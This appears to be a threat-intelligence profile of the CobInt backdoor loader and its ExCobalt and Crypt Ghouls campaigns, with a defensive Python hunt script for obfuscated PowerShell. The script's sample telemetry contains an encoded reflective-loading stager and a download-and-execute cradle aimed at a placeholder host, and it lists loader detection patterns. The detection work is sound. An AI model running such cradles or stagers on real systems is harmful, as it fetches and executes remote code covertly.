CobInt
CobInt is a backdoor/loader observed in campaigns targeting Russian organizations. The reporting this page draws on associates it with ExCobalt (also referenced in overlap analysis as Shedding Zmiy/ExCobalt) and with the threat actor Crypt Ghouls. Kaspersky described CobInt as a "telltale tool" and identified it as a backdoor used by ExCobalt; in observed Crypt Ghouls intrusions it served as a backdoor loader.

The specific CobInt downloader described in the reporting was a VBScript named Intellpui.vbs that executed obfuscated PowerShell code, so that the next-stage malware was loaded directly into memory and the payload itself never touched disk. This does not make the chain artifact-free: the VBScript is an on-disk file, the wscript.exe to powershell.exe process chain is visible in process-creation telemetry, and PowerShell script block logging records the deobfuscated code it executes.

The surrounding intrusion activity in that reporting included abuse of compromised contractor and subcontractor credentials for VPN access, followed by use of NSSM and Localtonet for persistence and remote access, credential theft with Mimikatz and XenAllPasswordPro, and deployment of LockBit 3.0 on Windows and Babuk on Linux/ESXi. Related ExCobalt activity in the same reporting included attempts to steal Telegram credentials and message history and Outlook Web Access credentials. Victim organizations mentioned in connection with these campaigns included Russian businesses, government agencies, and entities in mining, energy, finance, and retail.

The only explicit CobInt-related filename/IOC in the content is Intellpui.vbs.
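As an added example (not code from Kaspersky or from the reports summarized here), the following Python hunt applies the chain described above to process-creation telemetry: a script host launching powershell.exe, an encoded command decoded from UTF-16LE Base64, and strings that indicate the payload is being decoded and loaded reflectively rather than written to disk. The log records are constructed, the indicator strings are assumptions about the technique in general rather than signatures of a specific CobInt sample, and the field names follow Sysmon Event ID 1.

```python
"""Hunt for a script host launching obfuscated PowerShell that loads its
payload in memory (the CobInt downloader pattern described on this page).

Added example, not code from the reports this page summarizes. Records are
constructed; field names follow Sysmon Event ID 1 (Image, ParentImage,
CommandLine), but any EDR export with those fields works the same way.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Strings typical of PowerShell stagers that decode and reflectively load a
# payload instead of dropping it. Assumed indicators for the technique in
# general, not taken from a specific CobInt sample.
IN_MEMORY_LOADER_PATTERNS = (
    r"\[(?:System\.)?Reflection\.Assembly\]::Load",
    r"FromBase64String",
    r"Invoke-Expression|\bIEX\b",
    r"New-Object\s+(?:System\.)?Net\.WebClient",
    r"DownloadString|DownloadData",
)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")


@dataclass
class Finding:
    severity: str          # "high" or "medium"
    reasons: list
    decoded_command: str   # plaintext of -EncodedCommand, "" if none


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext behind -EncodedCommand (or -e/-ec/-enc), else "".

    powershell.exe expects Base64 of a UTF-16LE string, so decode as such.
    """
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                  cmdline, re.IGNORECASE)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_process_event(event: dict) -> Finding | None:
    """Score one process-creation record; None if nothing stands out."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None

    reasons = []
    parent_name = parent.rsplit("\\", 1)[-1]
    if parent_name in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent_name}")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        reasons.append("encoded command decoded from UTF-16LE Base64")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.IGNORECASE):
        reasons.append("hidden window requested")

    # Check the visible command line and the decoded payload; obfuscation
    # usually hides the loader strings in the latter.
    for text in (cmdline, decoded):
        for pat in IN_MEMORY_LOADER_PATTERNS:
            if re.search(pat, text, re.IGNORECASE):
                reason = f"in-memory loader indicator /{pat}/"
                if reason not in reasons:
                    reasons.append(reason)

    loader_hits = any(r.startswith("in-memory loader") for r in reasons)
    if loader_hits and parent_name in SCRIPT_HOSTS:
        return Finding("high", reasons, decoded)
    if loader_hits or decoded:
        return Finding("medium", reasons, decoded)
    return None


def hunt(events: list) -> list:
    """Return (record index, Finding) for every record that scores."""
    out = []
    for i, ev in enumerate(events):
        f = analyze_process_event(ev)
        if f:
            out.append((i, f))
    return out


# Constructed sample telemetry. Record 1 mimics the reported chain: the
# script host running the downloader VBScript, then PowerShell with an
# encoded stager that decodes and reflectively loads a payload.
STAGER = ("$b=[Convert]::FromBase64String($env:X);"
          "[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)")
STAGER_ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": "wscript.exe Intellpui.vbs",
     "CommandLine": f"powershell.exe -w hidden -nop -enc {STAGER_ENC}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s')"},
]

if __name__ == "__main__":
    for idx, finding in hunt(SAMPLE_EVENTS):
        print(idx, finding.severity, "; ".join(finding.reasons))
```

Running the block prints one line per scored record: the wscript.exe-spawned, encoded loader scores high, the plain download-cradle from cmd.exe scores medium, and the benign Get-Service call is ignored. The same IN_MEMORY_LOADER_PATTERNS applied to PowerShell Event ID 4104 ScriptBlockText catch the deobfuscated code even when the command line carries only an opaque Base64 blob, which is the check that matters against a loader designed to keep its payload off disk.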
Groups observed using it
2 distinct threat actors (ExCobalt and Crypt Ghouls) attributed by public researchers.
"...their use of CobInt, a backdoor loader... The CobInt downloader we encountered is a VBScript called Intellpui.vbs that executes obfuscated PowerShell code..."
"...attempts to siphon Telegram credentials... and Outlook Web Access credentials..."
"...CobInt, a known backdoor used by the group."
Techniques & procedures
4 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
"...threat actors leveraging a contractor's login credentials to connect to the internal systems via VPN... weaponizing trusted relationships."
"...Outlook Web Access credentials by injecting malicious code into the login page..."
"...shifting the focus... from the exploitation of 1-day vulnerabilities in corporate services available from the internet (e.g., Microsoft Exchange)..."
Persistence
1 technique
Privilege Escalation
1 technique
Stealth (ATT&CK Defense Evasion)
1 technique
Credential Access
1 technique
Collection
1 technique
Recent activity
3 sources tracked across advisories, community write-ups, and news.
Backdoor used by ExCobalt; associated activity includes theft of Telegram credentials and message history, and of Outlook Web Access credentials via malicious code injected into the OWA login page.
Backdoor/loader used to execute obfuscated PowerShell and load additional malware into memory (fileless/in-memory execution), reducing on-disk artifacts.
Backdoor used post-compromise to facilitate follow-on exploitation/remote control as part of the intrusion chain preceding ransomware deployment.